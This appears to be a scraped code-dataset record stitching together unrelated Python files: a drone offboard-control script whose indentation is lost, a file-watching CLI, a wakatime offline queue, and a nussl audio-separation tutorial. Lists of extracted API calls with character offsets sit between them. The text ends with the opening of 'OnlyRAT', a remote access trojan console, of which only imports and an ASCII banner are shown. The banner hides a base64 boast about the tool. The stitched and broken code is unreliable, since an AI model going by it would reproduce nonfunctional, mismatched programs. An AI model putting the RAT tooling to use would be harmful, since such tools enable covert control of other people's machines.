print("-- Starting offboard")
try:
await drone.offboard.start()
except OffboardError as error:
print(f"Starting offboard mode failed with error code: {error._result.result}")
print("-- Disarming")
await drone.action.disarm()
return
async def get_position():
async for position in drone.telemetry.position_velocity_ned():
return [position.position.north_m, position.position.east_m, position.position.down_m]
async def get_yaw():
async for ahrs in drone.telemetry.attitude_euler():
return ahrs.yaw_deg
await drone.offboard.set_position_ned(PositionNedYaw(*(await get_position())[:-1], -1, (await get_yaw())))
await asyncio.sleep(10)
dl = 0.01
dw = 0.1
while True:
if self.msg_queue.empty():
await asyncio.sleep(0)
continue
msg = self._recv()
if msg[0] == 0:
_, dx, dy, dz, speed = msg
yaw = (await get_yaw())*pi/180
dx, dy = cos(yaw) * dx - sin(yaw) * dy, sin(yaw) * dx + cos(yaw) * dy
x, y, z = await get_position()
tx, ty, tz = x + dx, y + dy, z + dz
start = perf_counter()
t = 0
while (x - tx)**2 + (y - ty)**2 + (z - tz)**2 > dl**2:
current = perf_counter()
while current - start > t:
ll = sqrt((x - tx)**2 + (y - ty)**2 + (z - tz)**2)
x -= dl * (x - tx) / ll
y -= dl * (y - ty) / ll
z -= dl * (z - tz) / ll
t += dl / speed
await drone.offboard.set_position_ned(PositionNedYaw(x, y, z, yaw*180/pi))
await get_position()
if self._recv3():
break
else:
await drone.offboard.set_position_ned(PositionNedYaw(tx, ty, tz, yaw*180/pi))
elif msg[0] == 1:
_, dyaw, speed = msg
x, y, z = await get_position()
yaw = await get_yaw()
tyaw = yaw + dyaw
start = perf_counter()
t = 0
while abs(yaw - tyaw) > dw:
current = perf_counter()
while current - start > t:
yaw -= dw * (yaw - tyaw) / abs(yaw - tyaw)
t += dw / speed
await drone.offboard.set_position_ned(PositionNedYaw(x, y, z, yaw))
await get_yaw()
if self._recv3():
break
else:
await drone.offboard.set_position_ned(PositionNedYaw(x, y, z, tyaw))
elif msg[0] == 2:
break
self._send2([*(await get_position()), await get_yaw()])
await asyncio.sleep(0)
await asyncio.sleep(1)
print("-- Stopping offboard")
try:
await drone.offboard.stop()
except OffboardError as error:
print(f"Stopping offboard mode failed with error code: {error._result.result}")
await asyncio.sleep(1)
print("-- Landing")
await drone.action.land()
if __name__ == "__main__":
drone = Drone()
drone.start()
while True:
try:
msg = input(">> ")
if msg == "stop":
drone.stop()
elif msg == "amove":
dx, dy, dz = map(float, input("dx dy dz: ").split())
drone.move_nowait(dx, dy, dz)
elif msg == "aturn":
dyaw = float(input("dyaw: "))
drone.turn_nowait(dyaw)
elif msg == "move":
dx, dy, dz = map(float, input("dx dy dz: ").split())
drone.move(dx, dy, dz)
elif msg == "turn":
dyaw = float(input("dyaw: "))
drone.turn(dyaw)
elif msg == "wait":
drone.wait()
elif msg == "land":
drone.land()
break
except Exception as e:
print(e)
| [
"mavsdk.offboard.PositionNedYaw",
"math.sqrt",
"time.perf_counter",
"mavsdk.System",
"math.cos",
"asyncio.sleep",
"multiprocessing.Queue",
"math.sin"
] | [((572, 579), 'multiprocessing.Queue', 'Queue', ([], {}), '()\n', (577, 579), False, 'from multiprocessing import Process, Queue\n'), ((606, 613), 'multiprocessing.Queue', 'Queue', ([], {}), '()\n', (611, 613), False, 'from multiprocessing import Process, Queue\n'), ((640, 647), 'multiprocessing.Queue', 'Queue', ([], {}), '()\n', (645, 647), False, 'from multiprocessing import Process, Queue\n'), ((1927, 1935), 'mavsdk.System', 'System', ([], {}), '()\n', (1933, 1935), False, 'from mavsdk import System\n'), ((4037, 4054), 'asyncio.sleep', 'asyncio.sleep', (['(10)'], {}), '(10)\n', (4050, 4054), False, 'import asyncio\n'), ((6323, 6339), 'asyncio.sleep', 'asyncio.sleep', (['(1)'], {}), '(1)\n', (6336, 6339), False, 'import asyncio\n'), ((6578, 6594), 'asyncio.sleep', 'asyncio.sleep', (['(1)'], {}), '(1)\n', (6591, 6594), False, 'import asyncio\n'), ((3210, 3245), 'mavsdk.offboard.PositionNedYaw', 'PositionNedYaw', (['(0.0)', '(0.0)', '(0.0)', 'yaw0'], {}), '(0.0, 0.0, 0.0, yaw0)\n', (3224, 3245), False, 'from mavsdk.offboard import OffboardError, PositionNedYaw\n'), ((4574, 4588), 'time.perf_counter', 'perf_counter', ([], {}), '()\n', (4586, 4588), False, 'from time import perf_counter\n'), ((6291, 6307), 'asyncio.sleep', 'asyncio.sleep', (['(0)'], {}), '(0)\n', (6304, 6307), False, 'import asyncio\n'), ((4173, 4189), 'asyncio.sleep', 'asyncio.sleep', (['(0)'], {}), '(0)\n', (4186, 4189), False, 'import asyncio\n'), ((4712, 4726), 'time.perf_counter', 'perf_counter', ([], {}), '()\n', (4724, 4726), False, 'from time import perf_counter\n'), ((5568, 5582), 'time.perf_counter', 'perf_counter', ([], {}), '()\n', (5580, 5582), False, 'from time import perf_counter\n'), ((4803, 4854), 'math.sqrt', 'sqrt', (['((x - tx) ** 2 + (y - ty) ** 2 + (z - tz) ** 2)'], {}), '((x - tx) ** 2 + (y - ty) ** 2 + (z - tz) ** 2)\n', (4807, 4854), False, 'from math import sqrt, cos, sin, pi\n'), ((5679, 5693), 'time.perf_counter', 'perf_counter', ([], {}), '()\n', (5691, 5693), False, 'from time import perf_counter\n'), ((4390, 4398), 'math.cos', 'cos', (['yaw'], {}), '(yaw)\n', (4393, 4398), False, 'from math import sqrt, cos, sin, pi\n'), ((4406, 4414), 'math.sin', 'sin', (['yaw'], {}), '(yaw)\n', (4409, 4414), False, 'from math import sqrt, cos, sin, pi\n'), ((4421, 4429), 'math.sin', 'sin', (['yaw'], {}), '(yaw)\n', (4424, 4429), False, 'from math import sqrt, cos, sin, pi\n'), ((4437, 4445), 'math.cos', 'cos', (['yaw'], {}), '(yaw)\n', (4440, 4445), False, 'from math import sqrt, cos, sin, pi\n'), ((5091, 5130), 'mavsdk.offboard.PositionNedYaw', 'PositionNedYaw', (['x', 'y', 'z', '(yaw * 180 / pi)'], {}), '(x, y, z, yaw * 180 / pi)\n', (5105, 5130), False, 'from mavsdk.offboard import OffboardError, PositionNedYaw\n'), ((5317, 5359), 'mavsdk.offboard.PositionNedYaw', 'PositionNedYaw', (['tx', 'ty', 'tz', '(yaw * 180 / pi)'], {}), '(tx, ty, tz, yaw * 180 / pi)\n', (5331, 5359), False, 'from mavsdk.offboard import OffboardError, PositionNedYaw\n'), ((5906, 5934), 'mavsdk.offboard.PositionNedYaw', 'PositionNedYaw', (['x', 'y', 'z', 'yaw'], {}), '(x, y, z, yaw)\n', (5920, 5934), False, 'from mavsdk.offboard import OffboardError, PositionNedYaw\n'), ((6120, 6149), 'mavsdk.offboard.PositionNedYaw', 'PositionNedYaw', (['x', 'y', 'z', 'tyaw'], {}), '(x, y, z, tyaw)\n', (6134, 6149), False, 'from mavsdk.offboard import OffboardError, PositionNedYaw\n')] |
# coding: utf-8
import argparse
import time
from watchdog.observers import Observer
from pywatcher import PyWatcher
from logging import getLogger, Formatter, StreamHandler, DEBUG
logger = getLogger(__name__)
formatter = Formatter('%(asctime)s - %(levelname)s - %(message)s')
handler = StreamHandler()
handler.setLevel(DEBUG)
handler.setFormatter(formatter)
logger.setLevel(DEBUG)
logger.addHandler(handler)
COMMAND_DESCRIPTION = """\
-----------------------------------------------------------------------
PyWatcher:
monitor file and reload process. like gulp watch
e.g:
pywatcher -t . -c 'ping localhost'
-> if some file on current dir changed, restart process 'ping localhost'.
-----------------------------------------------------------------------
"""
def init():
"""
arguments.
"""
parser = argparse.ArgumentParser(description=COMMAND_DESCRIPTION, formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument(
'-t',
'--target-dir',
type=str,
required=True,
dest='target_dir_path',
help='target directory for watching.'
)
parser.add_argument(
'-c',
'--command',
type=str,
required=True,
dest='target_command_str',
help='target command. this command execute and restart when file changed.'
)
parser.add_argument(
'-s',
'--reload-interval-seconds',
type=int,
required=False,
default=5,
dest='reload_threshold_seconds',
help='reload threshold seconds.'
)
parser.add_argument(
'--reload-wait-seconds',
type=int,
required=False,
default=0,
dest='reload_wait_seconds',
help='reload wait seconds.'
)
parser.add_argument(
'--disable-capture-stdout',
required=False,
action='store_true',
default=False,
dest='is_disable_capture_stdout',
help='is_disable_capture_stdout'
)
parser.add_argument(
'-p',
'--pattern',
type=str,
nargs='*',
required=False,
dest='target_pattern_list',
help='target pattern for monitoring. default, all file match.',
metavar='TARGET_PATTERN',
)
parser.add_argument(
'--signal',
required=False,
type=str,
default='TERM',
choices=('TERM', 'KILL'),
dest='reload_signal',
help='reload_signal'
)
parser.add_argument(
'--is-use-shell',
required=False,
action='store_true',
default=False,
dest='is_use_shell',
help='use shell=True ?'
)
return parser.parse_args()
def main_action(target_dir, command, reload_threshold_seconds, watch_pattern_list,
reload_wait_seconds, is_use_shell, reload_signal, is_disable_capture_stdout):
while True:
event_handler = PyWatcher(
process_command=command,
reload_threshold_seconds=reload_threshold_seconds,
is_capture_subprocess_output=not is_disable_capture_stdout,
pattern_list=watch_pattern_list,
is_use_shell=is_use_shell,
reload_signal=reload_signal,
reload_wait_seconds=reload_wait_seconds,
logger=logger
)
observer = Observer()
observer.schedule(event_handler, target_dir, recursive=True)
observer.start()
try:
while True:
time.sleep(0.3)
except KeyboardInterrupt:
logger.info('stop watch request received.')
observer.stop()
logger.info('stop watch.')
break
observer.join()
def main():
args = init()
main_action(
target_dir=args.target_dir_path,
command=args.target_command_str,
reload_threshold_seconds=args.reload_threshold_seconds,
is_use_shell=args.is_use_shell,
watch_pattern_list=args.target_pattern_list,
reload_signal=args.reload_signal,
reload_wait_seconds=args.reload_wait_seconds,
is_disable_capture_stdout=args.is_disable_capture_stdout,
)
if __name__ in '__main__':
main()
| [
"logging.getLogger",
"logging.StreamHandler",
"argparse.ArgumentParser",
"logging.Formatter",
"time.sleep",
"pywatcher.PyWatcher",
"watchdog.observers.Observer"
] | [((190, 209), 'logging.getLogger', 'getLogger', (['__name__'], {}), '(__name__)\n', (199, 209), False, 'from logging import getLogger, Formatter, StreamHandler, DEBUG\n'), ((222, 276), 'logging.Formatter', 'Formatter', (['"""%(asctime)s - %(levelname)s - %(message)s"""'], {}), "('%(asctime)s - %(levelname)s - %(message)s')\n", (231, 276), False, 'from logging import getLogger, Formatter, StreamHandler, DEBUG\n'), ((287, 302), 'logging.StreamHandler', 'StreamHandler', ([], {}), '()\n', (300, 302), False, 'from logging import getLogger, Formatter, StreamHandler, DEBUG\n'), ((823, 931), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': 'COMMAND_DESCRIPTION', 'formatter_class': 'argparse.RawTextHelpFormatter'}), '(description=COMMAND_DESCRIPTION, formatter_class=\n argparse.RawTextHelpFormatter)\n', (846, 931), False, 'import argparse\n'), ((2920, 3227), 'pywatcher.PyWatcher', 'PyWatcher', ([], {'process_command': 'command', 'reload_threshold_seconds': 'reload_threshold_seconds', 'is_capture_subprocess_output': '(not is_disable_capture_stdout)', 'pattern_list': 'watch_pattern_list', 'is_use_shell': 'is_use_shell', 'reload_signal': 'reload_signal', 'reload_wait_seconds': 'reload_wait_seconds', 'logger': 'logger'}), '(process_command=command, reload_threshold_seconds=\n reload_threshold_seconds, is_capture_subprocess_output=not\n is_disable_capture_stdout, pattern_list=watch_pattern_list,\n is_use_shell=is_use_shell, reload_signal=reload_signal,\n reload_wait_seconds=reload_wait_seconds, logger=logger)\n', (2929, 3227), False, 'from pywatcher import PyWatcher\n'), ((3336, 3346), 'watchdog.observers.Observer', 'Observer', ([], {}), '()\n', (3344, 3346), False, 'from watchdog.observers import Observer\n'), ((3494, 3509), 'time.sleep', 'time.sleep', (['(0.3)'], {}), '(0.3)\n', (3504, 3509), False, 'import time\n')] |
# -*- coding: utf-8 -*-
"""
wakatime.queue
~~~~~~~~~~~~~~
Queue for offline time logging.
http://wakatime.com
:copyright: (c) 2014 <NAME>.
:license: BSD, see LICENSE for more details.
"""
import logging
import os
import traceback
from time import sleep
try:
import sqlite3
HAS_SQL = True
except ImportError:
HAS_SQL = False
log = logging.getLogger(__name__)
class Queue(object):
DB_FILE = os.path.join(os.path.expanduser('~'), '.wakatime.db')
def connect(self):
conn = sqlite3.connect(self.DB_FILE)
c = conn.cursor()
c.execute('''CREATE TABLE IF NOT EXISTS action (
file text,
time real,
project text,
language text,
lines integer,
branch text,
is_write integer,
plugin text)
''')
return (conn, c)
def push(self, data, plugin):
if not HAS_SQL:
return
try:
conn, c = self.connect()
action = {
'file': data.get('file'),
'time': data.get('time'),
'project': data.get('project'),
'language': data.get('language'),
'lines': data.get('lines'),
'branch': data.get('branch'),
'is_write': 1 if data.get('is_write') else 0,
'plugin': plugin,
}
c.execute('INSERT INTO action VALUES (:file,:time,:project,:language,:lines,:branch,:is_write,:plugin)', action)
conn.commit()
conn.close()
except sqlite3.Error:
log.error(traceback.format_exc())
def pop(self):
if not HAS_SQL:
return None
tries = 3
wait = 0.1
action = None
try:
conn, c = self.connect()
except sqlite3.Error:
log.debug(traceback.format_exc())
return None
loop = True
while loop and tries > -1:
try:
c.execute('BEGIN IMMEDIATE')
c.execute('SELECT * FROM action LIMIT 1')
row = c.fetchone()
if row is not None:
values = []
clauses = []
index = 0
for row_name in ['file', 'time', 'project', 'language', 'lines', 'branch', 'is_write']:
if row[index] is not None:
clauses.append('{0}=?'.format(row_name))
values.append(row[index])
else:
clauses.append('{0} IS NULL'.format(row_name))
index += 1
if len(values) > 0:
c.execute('DELETE FROM action WHERE {0}'.format(' AND '.join(clauses)), values)
else:
c.execute('DELETE FROM action WHERE {0}'.format(' AND '.join(clauses)))
conn.commit()
if row is not None:
action = {
'file': row[0],
'time': row[1],
'project': row[2],
'language': row[3],
'lines': row[4],
'branch': row[5],
'is_write': True if row[6] is 1 else False,
'plugin': row[7],
}
loop = False
except sqlite3.Error:
log.debug(traceback.format_exc())
sleep(wait)
tries -= 1
try:
conn.close()
except sqlite3.Error:
log.debug(traceback.format_exc())
return action
| [
"logging.getLogger",
"traceback.format_exc",
"sqlite3.connect",
"time.sleep",
"os.path.expanduser"
] | [((372, 399), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (389, 399), False, 'import logging\n'), ((450, 473), 'os.path.expanduser', 'os.path.expanduser', (['"""~"""'], {}), "('~')\n", (468, 473), False, 'import os\n'), ((530, 559), 'sqlite3.connect', 'sqlite3.connect', (['self.DB_FILE'], {}), '(self.DB_FILE)\n', (545, 559), False, 'import sqlite3\n'), ((1649, 1671), 'traceback.format_exc', 'traceback.format_exc', ([], {}), '()\n', (1669, 1671), False, 'import traceback\n'), ((1903, 1925), 'traceback.format_exc', 'traceback.format_exc', ([], {}), '()\n', (1923, 1925), False, 'import traceback\n'), ((3588, 3599), 'time.sleep', 'sleep', (['wait'], {}), '(wait)\n', (3593, 3599), False, 'from time import sleep\n'), ((3717, 3739), 'traceback.format_exc', 'traceback.format_exc', ([], {}), '()\n', (3737, 3739), False, 'import traceback\n'), ((3548, 3570), 'traceback.format_exc', 'traceback.format_exc', ([], {}), '()\n', (3568, 3570), False, 'import traceback\n')] |
# ---
# jupyter:
# jupytext:
# formats: ipynb,py:light
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.5.1
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# Separation via Time-Frequency Masking
# =====================================
#
# One of the most effective ways to separate sounds from a mixture is by
# *masking*. Consider the following mixture, which we will download via
# one of the dataset hooks in *nussl*.
# +
import nussl
import matplotlib.pyplot as plt
import numpy as np
import copy
import time
start_time = time.time()
musdb = nussl.datasets.MUSDB18(download=True)
item = musdb[40]
mix = item['mix']
sources = item['sources']
# -
# Let's listen to the mixture. Note that it contains 4 sources: drums, bass,
# vocals, and all other sounds (considered as one source: other).
mix.embed_audio()
print(mix)
# Let's now consider the time-frequency representation of this mixture:
plt.figure(figsize=(10, 3))
plt.title('Mixture spectrogram')
nussl.utils.visualize_spectrogram(mix, y_axis='mel')
plt.tight_layout()
plt.show()
# Masking means to assign each of these time-frequency bins to one of the four
# sources in part or in whole. The first method involves creating a *soft* mask
# on the time-frequency representation, while the second is a *binary* mask. How
# do we assign each time-frequency bin to each source? This is a very hard problem,
# in general. For now, let's consider that we *know* the actual assignment of each
# time-frequency bin. If we know that, how do we separate the sounds?
#
# First let's look at one of the sources, say the drums:
plt.figure(figsize=(10, 3))
plt.title('Drums')
nussl.utils.visualize_spectrogram(sources['drums'], y_axis='mel')
plt.tight_layout()
plt.show()
# Looking at this versus the mixture spectrogram, one can see which time-frequency
# bins belong to the drum. Now, let's build a *mask* on the mixture spectrogram
# using a soft mask. We construct the soft mask using the drum STFT data and the
# mixture STFT data, like so:
mask_data = np.abs(sources['drums'].stft()) / np.abs(mix.stft())
# Hmm, this may not be a safe way to do this. What if there's a `0` in both the source
# and the mix? Then we would get `0/0`, which would result in NaN in the mask. Or
# what if the source STFT is louder than the mix at some time-frequency bin due to
# cancellation between sources when mixed? Let's do things a bit more safely by
# using the maximum and some checking...
mask_data = (
np.abs(sources['drums'].stft()) /
np.maximum(
np.abs(mix.stft()),
np.abs(sources['drums'].stft())
) + nussl.constants.EPSILON
)
# Great, some peace of mind. Now let's apply the soft mask to the mixture to
# separate the drums. We can do this by element-wise multiplying the STFT and
# adding the mixture phase.
# +
magnitude, phase = np.abs(mix.stft_data), np.angle(mix.stft_data)
masked_abs = magnitude * mask_data
masked_stft = masked_abs * np.exp(1j * phase)
drum_est = mix.make_copy_with_stft_data(masked_stft)
drum_est.istft()
drum_est.embed_audio()
plt.figure(figsize=(10, 3))
plt.title('Separated drums')
nussl.utils.visualize_spectrogram(drum_est, y_axis='mel')
plt.tight_layout()
plt.show()
# -
# Cool! Sounds pretty good! But it'd be a drag if we had to type all of
# that every time we wanted to separate something. Lucky for you, we
# built this stuff into the core functionality of *nussl*!
#
# `SoftMask` and `BinaryMask`
# ---------------------------
#
# At the core of *nussl*'s separation functionality are the classes
# `SoftMask` and `BinaryMask`. These are classes that contain some logic
# for masking and can be used with AudioSignal objects. We have a soft mask
# already, so let's build a `SoftMask` object.
soft_mask = nussl.core.masks.SoftMask(mask_data)
# `soft_mask` contains our mask here:
soft_mask.mask.shape
# We can apply the soft mask to our mix and return the separated drums easily,
# using the `apply_mask` method:
# +
drum_est = mix.apply_mask(soft_mask)
drum_est.istft()
drum_est.embed_audio()
plt.figure(figsize=(10, 3))
plt.title('Separated drums')
nussl.utils.visualize_spectrogram(drum_est, y_axis='mel')
plt.tight_layout()
plt.show()
# -
# Sometimes masks are *binary* instead of *soft*. To apply a binary mask, we can do this:
# +
binary_mask = nussl.core.masks.BinaryMask(mask_data > .5)
drum_est = mix.apply_mask(binary_mask)
drum_est.istft()
drum_est.embed_audio()
plt.figure(figsize=(10, 3))
plt.title('Separated drums')
nussl.utils.visualize_spectrogram(drum_est, y_axis='mel')
plt.tight_layout()
plt.show()
# -
# Playing around with the threshold will result in more or less leakage of other sources:
# +
binary_mask = nussl.core.masks.BinaryMask(mask_data > .05)
drum_est = mix.apply_mask(binary_mask)
drum_est.istft()
drum_est.embed_audio()
plt.figure(figsize=(10, 3))
plt.title('Separated drums')
nussl.utils.visualize_spectrogram(drum_est, y_axis='mel')
plt.tight_layout()
plt.show()
# -
# You can hear the vocals slightly in the background as well as the
# other sources.
#
# Finally, given a list of separated sources, we can use some handy nussl
# functionality to easily visualize the masks and listen to the original
# sources that make up the mixture.
# +
plt.figure(figsize=(10, 7))
plt.subplot(211)
nussl.utils.visualize_sources_as_masks(
sources, db_cutoff=-60, y_axis='mel')
plt.subplot(212)
nussl.utils.visualize_sources_as_waveform(
sources, show_legend=False)
plt.tight_layout()
plt.show()
nussl.play_utils.multitrack(sources, ext='.wav')
# -
end_time = time.time()
time_taken = end_time - start_time
print(f'Time taken: {time_taken:.4f} seconds')
| [
"numpy.abs",
"nussl.core.masks.BinaryMask",
"nussl.play_utils.multitrack",
"nussl.utils.visualize_spectrogram",
"nussl.utils.visualize_sources_as_waveform",
"nussl.utils.visualize_sources_as_masks",
"matplotlib.pyplot.subplot",
"numpy.angle",
"matplotlib.pyplot.figure",
"numpy.exp",
"nussl.core.... | [((671, 682), 'time.time', 'time.time', ([], {}), '()\n', (680, 682), False, 'import time\n'), ((692, 729), 'nussl.datasets.MUSDB18', 'nussl.datasets.MUSDB18', ([], {'download': '(True)'}), '(download=True)\n', (714, 729), False, 'import nussl\n'), ((1045, 1072), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(10, 3)'}), '(figsize=(10, 3))\n', (1055, 1072), True, 'import matplotlib.pyplot as plt\n'), ((1073, 1105), 'matplotlib.pyplot.title', 'plt.title', (['"""Mixture spectrogram"""'], {}), "('Mixture spectrogram')\n", (1082, 1105), True, 'import matplotlib.pyplot as plt\n'), ((1106, 1158), 'nussl.utils.visualize_spectrogram', 'nussl.utils.visualize_spectrogram', (['mix'], {'y_axis': '"""mel"""'}), "(mix, y_axis='mel')\n", (1139, 1158), False, 'import nussl\n'), ((1159, 1177), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (1175, 1177), True, 'import matplotlib.pyplot as plt\n'), ((1178, 1188), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1186, 1188), True, 'import matplotlib.pyplot as plt\n'), ((1732, 1759), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(10, 3)'}), '(figsize=(10, 3))\n', (1742, 1759), True, 'import matplotlib.pyplot as plt\n'), ((1760, 1778), 'matplotlib.pyplot.title', 'plt.title', (['"""Drums"""'], {}), "('Drums')\n", (1769, 1778), True, 'import matplotlib.pyplot as plt\n'), ((1779, 1844), 'nussl.utils.visualize_spectrogram', 'nussl.utils.visualize_spectrogram', (["sources['drums']"], {'y_axis': '"""mel"""'}), "(sources['drums'], y_axis='mel')\n", (1812, 1844), False, 'import nussl\n'), ((1845, 1863), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (1861, 1863), True, 'import matplotlib.pyplot as plt\n'), ((1864, 1874), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1872, 1874), True, 'import matplotlib.pyplot as plt\n'), ((3202, 3229), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(10, 3)'}), '(figsize=(10, 3))\n', (3212, 3229), True, 'import matplotlib.pyplot as plt\n'), ((3230, 3258), 'matplotlib.pyplot.title', 'plt.title', (['"""Separated drums"""'], {}), "('Separated drums')\n", (3239, 3258), True, 'import matplotlib.pyplot as plt\n'), ((3259, 3316), 'nussl.utils.visualize_spectrogram', 'nussl.utils.visualize_spectrogram', (['drum_est'], {'y_axis': '"""mel"""'}), "(drum_est, y_axis='mel')\n", (3292, 3316), False, 'import nussl\n'), ((3317, 3335), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (3333, 3335), True, 'import matplotlib.pyplot as plt\n'), ((3336, 3346), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (3344, 3346), True, 'import matplotlib.pyplot as plt\n'), ((3898, 3934), 'nussl.core.masks.SoftMask', 'nussl.core.masks.SoftMask', (['mask_data'], {}), '(mask_data)\n', (3923, 3934), False, 'import nussl\n'), ((4193, 4220), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(10, 3)'}), '(figsize=(10, 3))\n', (4203, 4220), True, 'import matplotlib.pyplot as plt\n'), ((4221, 4249), 'matplotlib.pyplot.title', 'plt.title', (['"""Separated drums"""'], {}), "('Separated drums')\n", (4230, 4249), True, 'import matplotlib.pyplot as plt\n'), ((4250, 4307), 'nussl.utils.visualize_spectrogram', 'nussl.utils.visualize_spectrogram', (['drum_est'], {'y_axis': '"""mel"""'}), "(drum_est, y_axis='mel')\n", (4283, 4307), False, 'import nussl\n'), ((4308, 4326), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (4324, 4326), True, 'import matplotlib.pyplot as plt\n'), ((4327, 4337), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (4335, 4337), True, 'import matplotlib.pyplot as plt\n'), ((4452, 4496), 'nussl.core.masks.BinaryMask', 'nussl.core.masks.BinaryMask', (['(mask_data > 0.5)'], {}), '(mask_data > 0.5)\n', (4479, 4496), False, 'import nussl\n'), ((4576, 4603), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(10, 3)'}), '(figsize=(10, 3))\n', (4586, 4603), True, 'import matplotlib.pyplot as plt\n'), ((4604, 4632), 'matplotlib.pyplot.title', 'plt.title', (['"""Separated drums"""'], {}), "('Separated drums')\n", (4613, 4632), True, 'import matplotlib.pyplot as plt\n'), ((4633, 4690), 'nussl.utils.visualize_spectrogram', 'nussl.utils.visualize_spectrogram', (['drum_est'], {'y_axis': '"""mel"""'}), "(drum_est, y_axis='mel')\n", (4666, 4690), False, 'import nussl\n'), ((4691, 4709), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (4707, 4709), True, 'import matplotlib.pyplot as plt\n'), ((4710, 4720), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (4718, 4720), True, 'import matplotlib.pyplot as plt\n'), ((4835, 4880), 'nussl.core.masks.BinaryMask', 'nussl.core.masks.BinaryMask', (['(mask_data > 0.05)'], {}), '(mask_data > 0.05)\n', (4862, 4880), False, 'import nussl\n'), ((4960, 4987), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(10, 3)'}), '(figsize=(10, 3))\n', (4970, 4987), True, 'import matplotlib.pyplot as plt\n'), ((4988, 5016), 'matplotlib.pyplot.title', 'plt.title', (['"""Separated drums"""'], {}), "('Separated drums')\n", (4997, 5016), True, 'import matplotlib.pyplot as plt\n'), ((5017, 5074), 'nussl.utils.visualize_spectrogram', 'nussl.utils.visualize_spectrogram', (['drum_est'], {'y_axis': '"""mel"""'}), "(drum_est, y_axis='mel')\n", (5050, 5074), False, 'import nussl\n'), ((5075, 5093), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (5091, 5093), True, 'import matplotlib.pyplot as plt\n'), ((5094, 5104), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (5102, 5104), True, 'import matplotlib.pyplot as plt\n'), ((5389, 5416), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(10, 7)'}), '(figsize=(10, 7))\n', (5399, 5416), True, 'import matplotlib.pyplot as plt\n'), ((5417, 5433), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(211)'], {}), '(211)\n', (5428, 5433), True, 'import matplotlib.pyplot as plt\n'), ((5434, 5510), 'nussl.utils.visualize_sources_as_masks', 'nussl.utils.visualize_sources_as_masks', (['sources'], {'db_cutoff': '(-60)', 'y_axis': '"""mel"""'}), "(sources, db_cutoff=-60, y_axis='mel')\n", (5472, 5510), False, 'import nussl\n'), ((5516, 5532), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(212)'], {}), '(212)\n', (5527, 5532), True, 'import matplotlib.pyplot as plt\n'), ((5533, 5602), 'nussl.utils.visualize_sources_as_waveform', 'nussl.utils.visualize_sources_as_waveform', (['sources'], {'show_legend': '(False)'}), '(sources, show_legend=False)\n', (5574, 5602), False, 'import nussl\n'), ((5608, 5626), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (5624, 5626), True, 'import matplotlib.pyplot as plt\n'), ((5627, 5637), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (5635, 5637), True, 'import matplotlib.pyplot as plt\n'), ((5639, 5687), 'nussl.play_utils.multitrack', 'nussl.play_utils.multitrack', (['sources'], {'ext': '""".wav"""'}), "(sources, ext='.wav')\n", (5666, 5687), False, 'import nussl\n'), ((5704, 5715), 'time.time', 'time.time', ([], {}), '()\n', (5713, 5715), False, 'import time\n'), ((2979, 3000), 'numpy.abs', 'np.abs', (['mix.stft_data'], {}), '(mix.stft_data)\n', (2985, 3000), True, 'import numpy as np\n'), ((3002, 3025), 'numpy.angle', 'np.angle', (['mix.stft_data'], {}), '(mix.stft_data)\n', (3010, 3025), True, 'import numpy as np\n'), ((3088, 3108), 'numpy.exp', 'np.exp', (['(1.0j * phase)'], {}), '(1.0j * phase)\n', (3094, 3108), True, 'import numpy as np\n')] |
#!/usr/bin/python
# python console for OnlyRAT
# created by : C0SM0
# imports
import os
import sys
import getpass
import random as r
from datetime import datetime
# banner for display
banner = """
_;,
,,=-,--,,__ _,-;:;;},,,_
_,oo, Ll _,##&&&&$$&&$$$&-=;%%^%&;v:&& @ `=,_
,oO" `0} Ll ,%#####&#>&&$$$$&$$$&,&'$$#`"%%;,,,*%^<}
_,--O;_, 0_ Ll ,%%%%%&%-#&###$$"$$$$$*;&&$,#;%^*%$$^{,%;'
,cC'oO`'CC ,OnnNNNNn, Ll YY, ,%#&%%$$$$%%%%%##&&^$%^%&&&$$'&#,-%%--"'
,CCCO" `C ,0`Nn` `Nn Ll YY, ,;;##&,$$$$$$$;,%%%&&%%%&&&&&&$$%%'
{CC{ ,0' NN NN Ll Yy yY';#&,#,$$$$$%%%%%%%%&%%%&&&&&&%%`
CCC( _o0 NN NN Ll YyyY ,;&##&###%%$$%&&%%%%#^%^&&&&&%{`
,OCC{ ,0C NN NN Ll YY ;#&&#####&%;%&&,%%%%#%=%%%&^%%
,O`'"Cc_.o0cC NN NN Ll y, YY ;&&&^##&&&$%&&&%%%"` `%%%%
o0 _o0"` '` NN NN Ll Yy,yYY '^%%&VGh%%%%%&&"^%_,, "%%%,_ _,.,_
0o,_,oo0" NN NN Ll `YyY` ``'"lIG9ubHkg,,""''` ""%%>_,;VyIG5lZ;,
"00O"` ``'``""UkFUIHlvdSdsbCBldm;" `"WQ=,
"""
# _..----.._ _
